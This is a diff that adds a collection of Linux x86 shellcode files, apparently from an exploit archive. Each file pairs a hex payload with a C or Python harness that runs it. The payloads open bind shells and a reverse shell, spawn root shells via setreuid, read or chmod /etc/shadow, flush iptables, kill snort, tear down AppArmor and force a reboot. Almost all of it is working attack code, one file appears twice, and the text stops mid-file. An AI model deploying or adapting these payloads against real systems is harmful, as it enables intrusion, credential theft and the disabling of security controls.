+1                                                                      1
+0  [+] Site            : Inj3ct0r.com                                  0
+1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
+0                                                                      0
+0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
+Title  : Polymorphic shellcode that bindport to 13123 x86 linux shellcode.
+Name   : 125 bytes bind port 13123 x86 linux polymorphic shellcode.
+Date   : Sat Jun  17 21:27:03 2010
+Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
+Web    : http://devilzc0de.org
+blog   : http://gunslingerc0de.wordpress.com
+tested on : linux debian
+special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), 
+                           mywisdom (devilzc0de.org), loneferret (offensive-security.com)
+                           greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !!
+*/
+
+#include <stdio.h>
+
+char bindport[] = "\xeb\x11\x5e\x31\xc9\xb1\x65\x80\x6c\x0e\xff\x35\x80\xe9\x01"
+		  "\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x66\xf5\x66\x10\x66\x07"
+		  "\x85\x9f\x36\x9f\x37\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\xbe\xfb"
+		  "\x87\x9d\xf0\x37\x68\x78\xbe\x16\x9f\x45\x86\x8b\xbe\x16\x33"
+		  "\xf8\xe5\x9b\x02\xb5\x87\x8b\xbe\x16\xe8\x39\xe5\x9b\x02\xb5"
+		  "\x87\x87\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\xbe\xf8\x66\xfe"
+		  "\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5\x87"
+		  "\x9d\x64\x64\xa8\x9d\x9d\x64\x97\x9e\xa3\xbe\x18\x87\x88\xbe"
+		  "\x16\xe5\x40\x02\xb5";
+
+int main(void)
+{
+	//fprintf(stdout,"Length: %d\n",strlen(bindport));
+	(*(void(*)()) bindport)();
+}
--- a/shellcodes/linux_x86/43699.c
+++ b/shellcodes/linux_x86/43699.c
@ -0,0 +1,40 @@
+Name = John Babio
+Twitter = 3vi1john
+Arch = Linux/x86-32 bits
+
+Code ///sbin/iptables -POUTPUT DROP(Policy of drop to OUTPUT chain)
+
+const char sc[] = 
+"\x31\xc0\x31\xd2\x50\x68\x44\x52\x4f\x50\x89\xe7\x50\x68\x54\x50\x55\x54\x68\x2d"
+"\x50\x4f\x55\x89\xe1\x50\x68\x62\x6c\x65\x73\x68\x69\x70\x74\x61\x68\x62\x69\x6e"
+"\x2f\x68\x2f\x2f\x2f\x73\x89\xe3\x50\x57\x51\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";       
+main(){
+      int (*shell)();
+      shell=sc;
+      shell();
+    }
+
+08048060 <_start>:
+ 8048060:    31 c0                    xor    %eax,%eax
+ 8048062:    31 d2                    xor    %edx,%edx
+ 8048064:    50                       push   %eax
+ 8048065:    68 44 52 4f 50           push   $0x504f5244
+ 804806a:    89 e7                    mov    %esp,%edi
+ 804806c:    50                       push   %eax
+ 804806d:    68 54 50 55 54           push   $0x54555054
+ 8048072:    68 2d 50 4f 55           push   $0x554f502d
+ 8048077:    89 e1                    mov    %esp,%ecx
+ 8048079:    50                       push   %eax
+ 804807a:    68 62 6c 65 73           push   $0x73656c62
+ 804807f:    68 69 70 74 61           push   $0x61747069
+ 8048084:    68 62 69 6e 2f           push   $0x2f6e6962
+ 8048089:    68 2f 2f 2f 73           push   $0x732f2f2f
+ 804808e:    89 e3                    mov    %esp,%ebx
+ 8048090:    50                       push   %eax
+ 8048091:    57                       push   %edi
+ 8048092:    51                       push   %ecx
+ 8048093:    53                       push   %ebx
+ 8048094:    89 e1                    mov    %esp,%ecx
+ 8048096:    31 d2                    xor    %edx,%edx
+ 8048098:    b0 0b                    mov    $0xb,%al
+ 804809a:    cd 80                    int    $0x80
--- a/shellcodes/linux_x86/43700.c
+++ b/shellcodes/linux_x86/43700.c
@ -0,0 +1,32 @@
+Name = John Babio
+Twitter = 3vi1john
+
+/usr/bin/killall snort
+
+const char sc[] = "\x31\xc0\x50\x6a\x74\x68\x73\x6e\x6f\x72\x89\xe6\x50\x68\x6c\x61\x6c\x6c\x68\x2f\x6b"
+"\x69\x6c\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3\x50\x56\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";
+main(){
+      int (*shell)();
+      shell=sc;
+      shell();
+    }
+
+8048060 <_start>:
+ 8048060:       31 c0                   xor    %eax,%eax
+ 8048062:       50                      push   %eax
+ 8048063:       6a 74                   push   $0x74
+ 8048065:       68 73 6e 6f 72          push   $0x726f6e73
+ 804806a:       89 e6                   mov    %esp,%esi
+ 804806c:       50                      push   %eax
+ 804806d:       68 6c 61 6c 6c          push   $0x6c6c616c
+ 8048072:       68 2f 6b 69 6c          push   $0x6c696b2f
+ 8048077:       68 2f 62 69 6e          push   $0x6e69622f
+ 804807c:       68 2f 75 73 72          push   $0x7273752f
+ 8048081:       89 e3                   mov    %esp,%ebx
+ 8048083:       50                      push   %eax
+ 8048084:       56                      push   %esi
+ 8048085:       53                      push   %ebx
+ 8048086:       89 e1                   mov    %esp,%ecx
+ 8048088:       31 d2                   xor    %edx,%edx
+ 804808a:       b0 0b                   mov    $0xb,%al
+ 804808c:       cd 80                   int    $0x80
--- a/shellcodes/linux_x86/43701.c
+++ b/shellcodes/linux_x86/43701.c
@ -0,0 +1,32 @@
+/*
+ Title: linux/x86 Shellcode execve ("/bin/sh") - 21 Bytes
+ Date     : 10 Feb 2011
+ Author   : kernel_panik
+ Thanks   : cOokie, agix, antrhacks
+*/
+
+/*
+ xor ecx, ecx
+ mul ecx
+ push ecx
+ push 0x68732f2f   ;; hs//
+ push 0x6e69622f   ;; nib/
+ mov ebx, esp
+ mov al, 11
+ int 0x80
+*/
+
+
+#include <stdio.h>
+#include <string.h>
+
+char code[] = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f"
+              "\x73\x68\x68\x2f\x62\x69\x6e\x89"
+              "\xe3\xb0\x0b\xcd\x80";
+
+int main(int argc, char **argv)
+{
+ printf ("Shellcode length : %d bytes\n", strlen (code));
+ int(*f)()=(int(*)())code;
+ f();
+}
--- a/shellcodes/linux_x86/43702.c
+++ b/shellcodes/linux_x86/43702.c
@ -0,0 +1,32 @@
+/*
+ Title: linux/x86 Shellcode execve ("/bin/sh") - 21 Bytes
+ Date     : 10 Feb 2011
+ Author   : kernel_panik
+ Thanks   : cOokie, agix, antrhacks
+*/
+
+/*
+ xor ecx, ecx
+ mul ecx
+ push ecx
+ push 0x68732f2f   ;; hs//
+ push 0x6e69622f   ;; nib/
+ mov ebx, esp
+ mov al, 11
+ int 0x80
+*/
+
+
+#include <stdio.h>
+#include <string.h>
+
+char code[] = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f"
+              "\x73\x68\x68\x2f\x62\x69\x6e\x89"
+              "\xe3\xb0\x0b\xcd\x80";
+
+int main(int argc, char **argv)
+{
+ printf ("Shellcode length : %d bytes\n", strlen (code));
+ int(*f)()=(int(*)())code;
+ f();
+}
--- a/shellcodes/linux_x86/43703.c
+++ b/shellcodes/linux_x86/43703.c
@ -0,0 +1,20 @@
+/*
+*  Shellcode length: 49 
+*  Author: Chroniccommand 
+*  /bin/dash
+*  My first attempt at shellcode
+*  Poison security
+*/
+#include<stdio.h>
+//49 bytes 
+char shellcode[] =  "\xeb\x18\x5e\x31\xc0\x88\x46\x09\x89\x76\x0a"
+                    "\x89\x46\x0e\xb0\x0b\x89\xf3\x8d\x4e\x0a\x8d"
+                    "\x56\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f"
+                    "\x62\x69\x6e\x2f\x64\x61\x73\x68\x41\x42\x42"
+                    "\x42\x42\x43\x43\x43\x43";
+int main(){
+ printf("Shellcode length: 49 bytes\nAuthor:chroniccommand\nPoison security");
+ int *ret;
+ ret = (int *)&ret + 2;
+ (*ret) = (int)shellcode;
+}
--- a/shellcodes/linux_x86/43704.c
+++ b/shellcodes/linux_x86/43704.c
@ -0,0 +1,50 @@
+/* 
+ * Title: linux/x86 execve(/bin/cat, /etc/shadow, NULL) - 42 bytes
+ * Type: Shellcode
+ * Author: antrhacks
+ * Platform: Linux X86
+*/
+
+/* ASSembly
+ 31 c0                	xor    %eax,%eax
+ 50                   	push   %eax
+ 68 2f 63 61 74       	push   $0x7461632f
+ 68 2f 62 69 6e       	push   $0x6e69622f
+ 89 e3                	mov    %esp,%ebx
+ 50                   	push   %eax
+ 68 61 64 6f 77       	push   $0x776f6461
+ 68 2f 2f 73 68       	push   $0x68732f2f
+ 68 2f 65 74 63       	push   $0x6374652f
+ 89 e1                	mov    %esp,%ecx
+ 50                   	push   %eax
+ 51                   	push   %ecx
+ 53                   	push   %ebx
+ 89 e1                	mov    %esp,%ecx
+ b0 0b                	mov    $0xb,%al
+ cd 80
+*/
+
+int main(){
+char shell[] =
+"\x31\xc0"
+"\x50"
+"\x68\x2f\x63\x61\x74"
+"\x68\x2f\x62\x69\x6e"
+"\x89\xe3"
+"\x50"
+"\x68\x61\x64\x6f\x77"
+"\x68\x2f\x2f\x73\x68"
+"\x68\x2f\x65\x74\x63"
+"\x89\xe1"
+"\x50"
+"\x51"
+"\x53"
+"\x89\xe1"
+"\xb0\x0b"
+"\xcd\x80";
+
+ printf("[*] Taille du ShellCode = %d\n", strlen(shell));
+ (*(void (*)()) shell)();
+ 
+ return 0;
+}
--- a/shellcodes/linux_x86/43705.c
+++ b/shellcodes/linux_x86/43705.c
@ -0,0 +1,35 @@
+Name = John Babio
+Twitter = 3vi1john
+
+/etc/init.d/apparmor teardown
+
+const char sc[] = "\x6a\x0b\x58\x31\xd2\x52\x68\x64\x6f\x77\x6e\x68\x74\x65\x61\x72\x89\xe1"
+"\x52\x68\x72\x6d\x6f\x72\x68\x61\x70\x70\x61\x68\x74\x2e\x64\x2f\x68\x2f\x69\x6e\x69\x68\x2f"
+"\x65\x74\x63\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";
+
+main(){
+      int (*shell)();
+      shell=sc;
+      shell();
+    }
+
+08048060 <_start>:
+ 8048060:    6a 0b                    push   $0xb
+ 8048062:    58                       pop    %eax
+ 8048063:    31 d2                    xor    %edx,%edx
+ 8048065:    52                       push   %edx
+ 8048066:    68 64 6f 77 6e           push   $0x6e776f64
+ 804806b:    68 74 65 61 72           push   $0x72616574
+ 8048070:    89 e1                    mov    %esp,%ecx
+ 8048072:    52                       push   %edx
+ 8048073:    68 72 6d 6f 72           push   $0x726f6d72
+ 8048078:    68 61 70 70 61           push   $0x61707061
+ 804807d:    68 74 2e 64 2f           push   $0x2f642e74
+ 8048082:    68 2f 69 6e 69           push   $0x696e692f
+ 8048087:    68 2f 65 74 63           push   $0x6374652f
+ 804808c:    89 e3                    mov    %esp,%ebx
+ 804808e:    52                       push   %edx
+ 804808f:    51                       push   %ecx
+ 8048090:    53                       push   %ebx
+ 8048091:    89 e1                    mov    %esp,%ecx
+ 8048093:    cd 80                    int    $0x80
--- a/shellcodes/linux_x86/43707.c
+++ b/shellcodes/linux_x86/43707.c
@ -0,0 +1,22 @@
+The comment in that file is not correct.. I cut and pasted the shell code
+in an existing c source and forgot to adjust it..
+
+/*
+ * This shellcode will do a mkdir() of 'hacked' and then an exit()
+ * Written by zillion@safemode.org
+ *
+ */
+
+char shellcode[]=
+        "\xeb\x16\x5e\x31\xc0\x88\x46\x06\xb0\x27\x8d\x1e\x66\xb9\xed"
+        "\x01\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe5\xff\xff\xff\x68"
+        "\x61\x63\x6b\x65\x64\x23";
+
+
+void main()
+{
+
+  int *ret;
+  ret = (int *)&ret + 2;
+  (*ret) = (int)shellcode;
+}
--- a/shellcodes/linux_x86/43708.c
+++ b/shellcodes/linux_x86/43708.c
@ -0,0 +1,21 @@
+/* 
+ *	Author: Sh3llc0d3
+ *	Environment: Linux/x86
+ *	Developed from: GNU ASM (AT&T Syntax)
+ *	Purpose: [setreuid()] -> [/sbin/iptables -F] -> [exit(0)]
+ *	Size: 76 bytes
+ *
+ *	Website:	root-exploit.com
+ */
+char code[] =	"\xeb\x33\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x5e\x31\xc0\x88\x46"
+		"\x0e\x88\x46\x11\x89\x76\x12\x8d\x5e\x0f\x89\x5e\x16\x89\x46\x1a\xb0"
+		"\x0b\x89\xf3\x8d\x4e\x12\x8d\x56\x1a\xcd\x80\x31\xc0\xb0\x01\x31\xdb"
+		"\xcd\x80\xe8\xc8\xff\xff\xff\x2f\x73\x62\x69\x6e\x2f\x69\x70\x74\x61"
+		"\x62\x6c\x65\x73\x23\x2d\x46\x23";
+
+int main(int argc, char **argv)
+{
+	int (*func)();
+	func = (int (*)()) code;
+	(int)(*func)();
+}
--- a/shellcodes/linux_x86/43709.c
+++ b/shellcodes/linux_x86/43709.c
@ -0,0 +1,15 @@
+# Title: Linux x86 setreuid (0,0) & execve("/bin/ash",NULL,NULL) + XOR encoded - 58 bytes
+# Author: egeektronic <info (at) egeektronic {dot} com>
+# Twitter: @egeektronic
+# Tested on: Slackware 13.37
+# Thanks: Jonathan Salwan, Yuda Prawira and Rizki Wicaksono 
+
+from ctypes import *
+
+shell = "\xeb\x0d\x5e\x31\xc9\xb1\x26\x80\x36\x19\x46\xe2\xfa\xeb\x05\xe8\xee\xff\xff\xff\x28\xd9\x28\xc2\x28\xd0\x28\xcb\xa9\x5f\x28\xc2\x28\xd0\xd4\x99\xa9\x12\x4a\x71\x36\x78\x6a\x71\x71\x36\x7b\x70\x77\x90\xfa\x28\xd0\x28\xd0\x4a\xd4\x99"
+
+memory = create_string_buffer(shell, len(shell))
+
+shellcode = cast(memory, CFUNCTYPE(c_void_p))
+
+shellcode()
--- a/shellcodes/linux_x86/43711.c
+++ b/shellcodes/linux_x86/43711.c
@ -0,0 +1,15 @@
+# Title: Linux x86 setreuid (0,0) & execve("/bin/csh", ["/bin/csh", NULL]) + XOR encoded - 53 bytes
+# Author: egeektronic <info (at) egeektronic {dot} com>
+# Twitter: @egeektronic
+# Tested on: Slackware 13.37
+# Thanks: Jonathan Salwan, Yuda Prawira and Rizki Wicaksono
+
+from ctypes import *
+
+shell = "\xeb\x0d\x5e\x31\xc9\xb1\x21\x80\x36\x7c\x46\xe2\xfa\xeb\x05\xe8\xee\xff\xff\xff\x16\x3a\x24\x4d\xa7\x4d\xb5\xb1\xfc\x4d\xae\x16\x77\x24\x2e\x14\x53\x1f\x0f\x14\x14\x53\x1e\x15\x12\xf5\x9f\x2e\x2f\xf5\x9d\xb1\xfc"
+
+memory = create_string_buffer(shell, len(shell))
+
+shellcode = cast(memory, CFUNCTYPE(c_void_p))
+
+shellcode()
--- a/shellcodes/linux_x86/43712.c
+++ b/shellcodes/linux_x86/43712.c
@ -0,0 +1,15 @@
+# Title: Linux x86 setreuid (0,0) & execve("/bin/ksh", ["/bin/ksh", NULL]) + XOR encoded - 53 bytes
+# Author: egeektronic <info (at) egeektronic {dot} com>
+# Twitter: @egeektronic
+# Tested on: Slackware 13.37
+# Thanks: Jonathan Salwan, Yuda Prawira and Rizki Wicaksono
+
+from ctypes import *
+
+shell = "\xeb\x0d\x5e\x31\xc9\xb1\x21\x80\x36\x7c\x46\xe2\xfa\xeb\x05\xe8\xee\xff\xff\xff\x16\x3a\x24\x4d\xa7\x4d\xb5\xb1\xfc\x4d\xae\x16\x77\x24\x2e\x14\x53\x17\x0f\x14\x14\x53\x1e\x15\x12\xf5\x9f\x2e\x2f\xf5\x9d\xb1\xfc"
+
+memory = create_string_buffer(shell, len(shell))
+
+shellcode = cast(memory, CFUNCTYPE(c_void_p))
+
+shellcode()
--- a/shellcodes/linux_x86/43714.c
+++ b/shellcodes/linux_x86/43714.c
@ -0,0 +1,15 @@
+# Title: Linux x86 setreuid (0,0) & execve("/bin/zsh", ["/bin/zsh", NULL]) + XOR encoded - 53 bytes
+# Author: egeektronic <info (at) egeektronic {dot} com>
+# Twitter: @egeektronic
+# Tested on: Slackware 13.37
+# Thanks: Jonathan Salwan, Yuda Prawira and Rizki Wicaksono
+
+from ctypes import *
+
+shell = "\xeb\x0d\x5e\x31\xc9\xb1\x21\x80\x36\x35\x46\xe2\xfa\xeb\x05\xe8\xee\xff\xff\xff\x5f\x73\x6d\x04\xee\x04\xfc\xf8\xb5\x04\xe7\x5f\x3e\x6d\x67\x5d\x1a\x4f\x46\x5d\x5d\x1a\x57\x5c\x5b\xbc\xd6\x67\x66\xbc\xd4\xf8\xb5"
+
+memory = create_string_buffer(shell, len(shell))
+
+shellcode = cast(memory, CFUNCTYPE(c_void_p))
+
+shellcode()
--- a/shellcodes/linux_x86/43716.c
+++ b/shellcodes/linux_x86/43716.c
@ -0,0 +1,38 @@
+/*
+Title:	Linux x86 execve("/bin/sh") - 28 bytes
+Author:	Jean Pascal Pereira <pereira@secbiz.de>
+Web:	http://0xffe4.org
+
+
+Disassembly of section .text:
+
+08048060 <_start>:
+ 8048060: 31 c0                 xor    %eax,%eax
+ 8048062: 50                    push   %eax
+ 8048063: 68 2f 2f 73 68        push   $0x68732f2f
+ 8048068: 68 2f 62 69 6e        push   $0x6e69622f
+ 804806d: 89 e3                 mov    %esp,%ebx
+ 804806f: 89 c1                 mov    %eax,%ecx
+ 8048071: 89 c2                 mov    %eax,%edx
+ 8048073: b0 0b                 mov    $0xb,%al
+ 8048075: cd 80                 int    $0x80
+ 8048077: 31 c0                 xor    %eax,%eax
+ 8048079: 40                    inc    %eax
+ 804807a: cd 80                 int    $0x80
+
+
+
+*/
+
+#include <stdio.h>
+
+char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73"
+                   "\x68\x68\x2f\x62\x69\x6e\x89"
+                   "\xe3\x89\xc1\x89\xc2\xb0\x0b"
+                   "\xcd\x80\x31\xc0\x40\xcd\x80";
+
+int main()
+{
+  fprintf(stdout,"Lenght: %d\n",strlen(shellcode));
+  (*(void  (*)()) shellcode)();
+}
--- a/shellcodes/linux_x86/43719.c
+++ b/shellcodes/linux_x86/43719.c
@ -0,0 +1,29 @@
+/*
+ * (linux/x86) stagger that reads second stage shellcode (127 bytes maximum) from stdin - 14 bytes
+ * _fkz / twitter: @_fkz 
+ *
+ * sc = "\x6A\x7F\x5A\x54\x59\x31\xDB\x6A\x03\x58\xCD\x80\x51\xC3"
+ * 
+ * Example of use:
+ * (echo -ne "\xseconde stage shellcode\x"; cat) | ./stager
+ */
+ 
+ char shellcode[] = 
+ 
+ 		"\x6A\x7F"		//	push	byte	+0x7F
+ 		"\x5A"			//	pop		edx	
+ 		"\x54"			//	push	esp
+ 		"\x59"			//	pop		esp
+ 		"\x31\xDB"		//	xor		ebx,ebx
+ 		"\x6A\x03"		//	push	byte	+0x3
+ 		"\x58"			//	pop		eax
+ 		"\xCD\x80"		//	int		0x80
+ 		"\x51"			//	push	ecx
+ 		"\xC3";			//	ret
+
+int main(int argc, char *argv[])
+{
+	void (*execsh)() = (void *)&shellcode;
+	execsh();
+	return 0;
+}
--- a/shellcodes/linux_x86/43721.c
+++ b/shellcodes/linux_x86/43721.c
@ -0,0 +1,45 @@
+    *****************************************************
+    *    Linux/x86 iptables --flush 43 bytes 	        *
+    *****************************************************
+    *	  	  Author: Hamza Megahed		        *
+    *****************************************************
+    *             Twitter: @Hamza_Mega                  *
+    *****************************************************
+    *     blog: hamza-mega[dot]blogspot[dot]com         *
+    *****************************************************
+    *   E-mail: hamza[dot]megahed[at]gmail[dot]com      *
+    *****************************************************
+
+xor    %eax,%eax
+push   %eax
+pushw  $0x462d
+movl   %esp,%esi
+pushl  %eax
+pushl  $0x73656c62
+pushl  $0x61747069
+pushl  $0x2f6e6962
+pushl  $0x732f2f2f
+mov    %esp,%ebx
+pushl  %eax
+pushl  %esi
+pushl  %ebx
+movl   %esp,%ecx
+mov    %eax,%edx
+mov    $0xb,%al
+int    $0x80
+
+********************************
+#include <stdio.h>
+#include <string.h>
+ 
+char *shellcode = "\x31\xc0\x50\x66\x68\x2d\x46\x89\xe6\x50\x68\x62\x6c\x65\x73"
+		  "\x68\x69\x70\x74\x61\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f"
+		  "\x73\x89\xe3\x50\x56\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80";
+
+ 
+int main(void)
+{
+fprintf(stdout,"Length: %d\n",strlen(shellcode));
+(*(void(*)()) shellcode)();
+return 0;
+}
--- a/shellcodes/linux_x86/43722.c
+++ b/shellcodes/linux_x86/43722.c
@ -0,0 +1,36 @@
+    *****************************************************
+    *    Linux/x86 execve /bin/sh shellcode 23 bytes    *
+    *****************************************************
+    *	  	  Author: Hamza Megahed		        *
+    *****************************************************
+    *             Twitter: @Hamza_Mega                  *
+    *****************************************************
+    *     blog: hamza-mega[dot]blogspot[dot]com         *
+    *****************************************************
+    *   E-mail: hamza[dot]megahed[at]gmail[dot]com      *
+    *****************************************************
+
+xor    %eax,%eax
+push   %eax
+push   $0x68732f2f
+push   $0x6e69622f
+mov    %esp,%ebx
+push   %eax
+push   %ebx
+mov    %esp,%ecx
+mov    $0xb,%al
+int    $0x80
+
+********************************
+#include <stdio.h>
+#include <string.h>
+ 
+char *shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
+		  "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
+
+int main(void)
+{
+fprintf(stdout,"Length: %d\n",strlen(shellcode));
+(*(void(*)()) shellcode)();
+return 0;
+}
--- a/shellcodes/linux_x86/43724.c
+++ b/shellcodes/linux_x86/43724.c
@ -0,0 +1,55 @@
+*****************************************************
+* Linux/x86 execve-chmod 0777 /etc/shadow  57 bytes *
+*****************************************************
+* Author: Hamza Megahed                             *
+*****************************************************
+* Twitter: @Hamza_Mega                              *
+*****************************************************
+* blog: hamza-mega[dot]blogspot[dot]com             *
+*****************************************************
+* E-mail: hamza[dot]megahed[at]gmail[dot]com        *
+*****************************************************
+
+xor    %eax,%eax
+push   %eax
+pushl  $0x776f6461
+pushl  $0x68732f2f
+pushl  $0x6374652f
+movl   %esp,%esi
+push   %eax
+pushl  $0x37373730
+movl   %esp,%ebp
+push   %eax
+pushl  $0x646f6d68
+pushl  $0x632f6e69
+pushl  $0x622f2f2f
+mov    %esp,%ebx
+pushl  %eax
+pushl  %esi
+pushl  %ebp
+pushl  %ebx
+movl   %esp,%ecx
+mov    %eax,%edx
+mov    $0xb,%al
+int    $0x80
+
+********************************
+#include <stdio.h>
+#include <string.h>
+ 
+char *shellcode = 
+"\x31\xc0\x50\x68\x61\x64\x6f\x77\x68\x2f\x2f\x73"
+"\x68\x68\x2f\x65\x74\x63\x89\xe6\x50\x68\x30\x37"
+"\x37\x37\x89\xe5\x50\x68\x68\x6d\x6f\x64\x68\x69"
+"\x6e\x2f\x63\x66\x68\x2f\x62\x89\xe3\x50\x56\x55"
+"\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80;";
+
+
+
+ 
+int main(void)
+{
+fprintf(stdout,"Length: %d\n",strlen(shellcode));
+(*(void(*)()) shellcode)();
+return 0;
+}
--- a/shellcodes/linux_x86/43725.c
+++ b/shellcodes/linux_x86/43725.c
@ -0,0 +1,44 @@
+**********************************************
+* Linux/x86 Force Reboot shellcode 36 bytes  *
+**********************************************
+* Author: Hamza Megahed                      *
+**********************************************
+* Twitter: @Hamza_Mega                       *
+**********************************************
+* blog: hamza-mega[dot]blogspot[dot]com      *
+**********************************************
+* E-mail: hamza[dot]megahed[at]gmail[dot]com *
+**********************************************
+
+xor    %eax,%eax
+push   %eax
+push   $0x746f6f62
+push   $0x65722f6e
+push   $0x6962732f
+mov    %esp,%ebx
+push   %eax
+pushw  $0x662d
+mov    %esp,%esi
+push   %eax
+push   %esi
+push   %ebx
+mov    %esp,%ecx
+mov    $0xb,%al
+int    $0x80
+
+**********************************************
+
+#include <stdio.h>
+#include <string.h>
+ 
+char *shellcode = "\x31\xc0\x50\x68\x62\x6f\x6f\x74\x68\x6e"
+                  "\x2f\x72\x65\x68\x2f\x73\x62\x69\x89\xe3"
+                  "\x50\x66\x68\x2d\x66\x89\xe6\x50\x56\x53"
+                  "\x89\xe1\xb0\x0b\xcd\x80";
+
+int main(void)
+{
+fprintf(stdout,"Length: %d\n",strlen(shellcode));
+(*(void(*)()) shellcode)();
+return 0;
+}
--- a/shellcodes/linux_x86/43726.c
+++ b/shellcodes/linux_x86/43726.c
@ -0,0 +1,79 @@
+/*
+
+ Shell Bind TCP Shellcode - C Language
+ Linux/x86
+
+ Written in 2013 by Geyslan G. Bem, Hacking bits
+
+ http://hackingbits.com
+ geyslan@gmail.com
+
+ This source is licensed under the Creative Commons
+ Attribution-ShareAlike 3.0 Brazil License.
+
+ To view a copy of this license, visit
+
+   http://creativecommons.org/licenses/by-sa/3.0/
+
+ You are free:
+
+    to Share - to copy, distribute and transmit the work
+    to Remix - to adapt the work
+    to make commercial use of the work
+
+ Under the following conditions:
+   Attribution - You must attribute the work in the manner
+                 specified by the author or licensor (but
+                 not in any way that suggests that they
+                 endorse you or your use of the work).
+
+   Share Alike - If you alter, transform, or build upon
+                 this work, you may distribute the
+                 resulting work only under the same or
+                 similar license to this one.
+
+
+ shell_bind_tcp_shellcode
+
+ * 103 bytes
+ * null-bytes free
+ * avoids SIGSEGV when reconnecting, setting SO_REUSEADDR (TIME_WAIT)
+ * the port number is easily changeable (3th and 4th bytes of the shellcode)
+
+
+ # gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
+ # ./shellcode
+
+ Testing
+ # nc 127.0.0.1 11111
+
+*/
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char code[] = \
+
+"\x66\xbd"
+"\x2b\x67" /* <- Port number 11111 (2 bytes) */
+"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89"
+"\xe1\xcd\x80\x89\xc6\x5f\xb0\x66\x6a\x04\x54\x57"
+"\x53\x56\x89\xe1\xb3\x0e\xcd\x80\xb0\x66\x89\xfb"
+"\x52\x66\x55\x66\x53\x89\xe1\x6a\x10\x51\x56\x89"
+"\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89\xe1\xcd"
+"\x80\xb0\x66\x43\x89\x54\x24\x08\xcd\x80\x93\x89"
+"\xf9\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68"
+"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52"
+"\x53\xeb\xa8";
+
+
+main ()
+{
+
+	printf("Shellcode Length:  %d\n", strlen(code));
+
+	int (*ret)() = (int(*)())code;
+
+	ret();
+
+}
--- a/shellcodes/linux_x86/43727.c
+++ b/shellcodes/linux_x86/43727.c
@ -0,0 +1,92 @@
+/*
+
+ Shell Reverse TCP Shellcode - C Language
+ Linux/x86
+
+ Written in 2013 by Geyslan G. Bem, Hacking bits
+
+   http://hackingbits.com
+   geyslan@gmail.com
+
+ This source is licensed under the Creative Commons
+ Attribution-ShareAlike 3.0 Brazil License.
+
+ To view a copy of this license, visit
+
+   http://creativecommons.org/licenses/by-sa/3.0/
+
+ You are free:
+
+    to Share - to copy, distribute and transmit the work
+    to Remix - to adapt the work
+    to make commercial use of the work
+
+ Under the following conditions:
+   Attribution - You must attribute the work in the manner
+                 specified by the author or licensor (but
+                 not in any way that suggests that they
+                 endorse you or your use of the work).
+
+   Share Alike - If you alter, transform, or build upon
+                 this work, you may distribute the
+                 resulting work only under the same or
+                 similar license to this one.
+
+*/
+
+/*
+
+ shell_reverse_tcp_shellcode
+
+ * 72 bytes
+ * null-bytes free if the port and address are
+ * the ip address and port number are easily changeable (2nd to 5th bytes are the IP) and (9th and 10th are the Port)
+ 
+
+ # gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
+ # ./shellcode
+
+ Testing
+ # nc -l 127.1.1.1 55555
+ # ./shellcode 
+
+*/
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char code[] = \
+
+"\x68"
+"\x7f\x01\x01\x01"  // <- IP Number "127.1.1.1"
+"\x5e\x66\x68"
+"\xd9\x03"          // <- Port Number "55555"
+"\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02"
+"\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79"
+"\xf9\xb0\x66\x56\x66\x57\x66\x6a\x02\x89\xe1\x6a"
+"\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f"
+"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
+"\xeb\xce";
+
+main ()
+{
+
+        // When the IP contains null-bytes, printf will show a wrong shellcode length.
+
+	printf("Shellcode Length:  %d\n", strlen(code));
+
+	// Pollutes all registers ensuring that the shellcode runs in any circumstance.
+
+	__asm__ ("movl $0xffffffff, %eax\n\t"
+		 "movl %eax, %ebx\n\t"
+		 "movl %eax, %ecx\n\t"
+		 "movl %eax, %edx\n\t"
+		 "movl %eax, %esi\n\t"
+		 "movl %eax, %edi\n\t"
+		 "movl %eax, %ebp");
+
+	int (*ret)() = (int(*)())code;
+
+	ret();
+
+}
--- a/shellcodes/linux_x86/43728.c
+++ b/shellcodes/linux_x86/43728.c
@ -0,0 +1,83 @@
+/*
+
+ Shell Bind TCP Random Port Shellcode - C Language
+ Linux/x86
+
+ Written in 2013 by Geyslan G. Bem, Hacking bits
+
+   http://hackingbits.com
+   geyslan@gmail.com
+
